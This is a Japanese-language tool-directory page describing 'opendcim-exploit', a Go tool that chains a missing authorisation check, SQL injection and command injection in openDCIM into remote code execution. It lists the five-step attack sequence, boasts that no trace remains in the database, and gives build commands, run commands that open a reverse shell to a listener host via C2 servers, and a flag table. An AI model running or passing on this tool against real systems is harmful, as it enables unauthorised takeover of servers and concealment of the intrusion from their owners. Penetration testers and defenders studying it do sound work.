Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
opendcim-exploit — openDCIM install.php SQLi から RCE への連鎖 (CWE-862 + CWE-89 + CWE-78) | Kitploit
ツール/GitHubGitHub/chocapikk/opendcim-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php SQLi から RCE への連鎖 (CWE-862 + CWE-89 + CWE-78)

リポジトリを見る
525ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

openDCIM - Config Poisoning を介した SQLi から RCE へ

openDCIM の install.php LDAP 設定フォームを標的としたリモートコード実行チェーン。VulnCheck go-exploit フレームワーク上に構築。

脆弱性チェーン

#CVECWE説明
1CVE-2026-28515CWE-862install.php は LDAP 設定フォームの前にロールチェックを行わない - 任意のユーザーが到達可能
2CVE-2026-28516CWE-89Config::UpdateParameter() は文字列補間を使用し、PDO+MySQL によるスタッククエリが可能
3CVE-2026-28517CWE-78report_network_map.php は dot 設定値を直接 exec() に渡す

影響を受けるバージョン: 全バージョン (最新コミット 4467e9c4 でテスト済み)

動作の仕組み

  1. install.php に POST - LDAP フォーム経由の SQL インジェクションで設定をバックアップし、dot をコマンドペイロードで上書き
  2. report_network_map.php を GET - exec() をトリガーし、id の出力で RCE を確認
  3. install.php に POST - dot をリバースシェルペイロードで上書き
  4. report_network_map.php を GET - リバースシェルをトリガー
  5. install.php に POST - バックアップテーブルから元の設定値をすべて復元

悪用後、データベースには痕跡が一切残りません。

ビルド

root@kitploit:~
go build -o opendcim-exploit .

使用方法

Docker デプロイ環境 (認証なし)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd デプロイ環境 (有効なユーザーなら誰でも)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

フラグ

ツールをダウンロード
フラグデフォルト説明
-rhostターゲットホスト
-rport80ターゲットポート
-sslfalseHTTPS を使用
-lhostリスナーホスト (リバースシェル用)
-lportリスナーポート (リバースシェル用)
-c2C2 タイプ: SimpleShellServer または SSLShellServer
-usernameHTTP Basic 認証のユーザー名 (SetEnv デプロイ環境では省略)
-passwordHTTP Basic 認証のパスワード (SetEnv デプロイ環境では省略)
-aアセット検出 (ターゲットが悪用可能か確認)
-e悪用モード